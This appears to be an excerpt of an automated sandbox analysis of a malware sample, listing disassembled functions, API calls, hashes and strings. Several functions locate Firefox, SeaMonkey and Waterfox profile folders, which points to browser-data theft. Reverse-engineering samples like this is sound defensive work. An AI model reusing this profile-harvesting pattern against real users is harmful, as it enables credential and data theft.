                                                                              • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                              • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                              Function 0040A804 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                              • String ID: C:\Windows\system32
                                                                              • API String ID: 669240632-2896066436
                                                                              • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                              • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                              Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00403CBF
                                                                              • memset.MSVCRT ref: 00403CD4
                                                                              • memset.MSVCRT ref: 00403CE9
                                                                              • memset.MSVCRT ref: 00403CFE
                                                                              • memset.MSVCRT ref: 00403D13
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                              • memset.MSVCRT ref: 00403DDA
                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                              • String ID: Waterfox$Waterfox\Profiles
                                                                              • API String ID: 4039892925-11920434
                                                                              • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                              • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                              Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00403E50
                                                                              • memset.MSVCRT ref: 00403E65
                                                                              • memset.MSVCRT ref: 00403E7A
                                                                              • memset.MSVCRT ref: 00403E8F
                                                                              • memset.MSVCRT ref: 00403EA4
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                              • memset.MSVCRT ref: 00403F6B
                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                              • API String ID: 4039892925-2068335096
                                                                              • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                              • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                              Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00403FE1
                                                                              • memset.MSVCRT ref: 00403FF6
                                                                              • memset.MSVCRT ref: 0040400B
                                                                              • memset.MSVCRT ref: 00404020
                                                                              • memset.MSVCRT ref: 00404035
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                              • memset.MSVCRT ref: 004040FC
                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                              • API String ID: 4039892925-3369679110
                                                                              • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                              • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                              Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memcpy
                                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                              • API String ID: 3510742995-2641926074
                                                                              • Opcode ID: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                              • Opcode Fuzzy Hash: 94510af7901ecd36673df76512f8cc8f4b4749faf5a93beda853377b65ea3140
                                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                              Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                              • memset.MSVCRT ref: 004033B7
                                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                              • wcscmp.MSVCRT ref: 004033FC
                                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                              • String ID: $0.@
                                                                              • API String ID: 2758756878-1896041820
                                                                              • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                              • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                              Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(00000000,00000000,00000065,?), ref: 004449E7
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                              • String ID:
                                                                              • API String ID: 2941347001-0
                                                                              • Opcode ID: 0a22d4763c93248a77a6dd38a703ed3c9df3f9550cf1aabc5898569e7f0c3cb4
                                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                              • Opcode Fuzzy Hash: 0a22d4763c93248a77a6dd38a703ed3c9df3f9550cf1aabc5898569e7f0c3cb4
                                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                              Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                              • GetProcAddress.KERNEL32(?,00000000,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404398
                                                                              • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043AC
                                                                              • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043BF
                                                                              • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043D3
                                                                              • GetProcAddress.KERNEL32(?,00000000,?,0040BDCC,?,00000000,?), ref: 004043E7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                              • String ID: advapi32.dll
                                                                              • API String ID: 2012295524-4050573280
                                                                              • Opcode ID: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                              • Opcode Fuzzy Hash: 4ec369c76c53d9d8d6299e0294e7621cc29ddf3fcf69dbd982a4794b684d00a1
                                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                              Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00403C09
                                                                              • memset.MSVCRT ref: 00403C1E
                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                              • wcscat.MSVCRT ref: 00403C47
                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                              • wcscat.MSVCRT ref: 00403C70
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                              • API String ID: 1534475566-1174173950
                                                                              • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                              • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                              Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW,00412794,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00414BA4
                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000), ref: 00414C68
                                                                              • memset.MSVCRT ref: 00414C87
                                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                              Strings
                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                              • API String ID: 71295984-2036018995
                                                                              • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                              • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                              Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wcschr.MSVCRT ref: 00414458
                                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                              • String ID: "%s"
                                                                              • API String ID: 1343145685-3297466227
                                                                              • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                              • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                              Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CCF
                                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                                              • String ID: GetProcessTimes$kernel32.dll
                                                                              • API String ID: 1714573020-3385500049
                                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                              Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • memset.MSVCRT ref: 004087D6
                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                              • memset.MSVCRT ref: 00408828
                                                                              • memset.MSVCRT ref: 00408840
                                                                              • memset.MSVCRT ref: 00408858
                                                                              • memset.MSVCRT ref: 00408870
                                                                              • memset.MSVCRT ref: 00408888
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
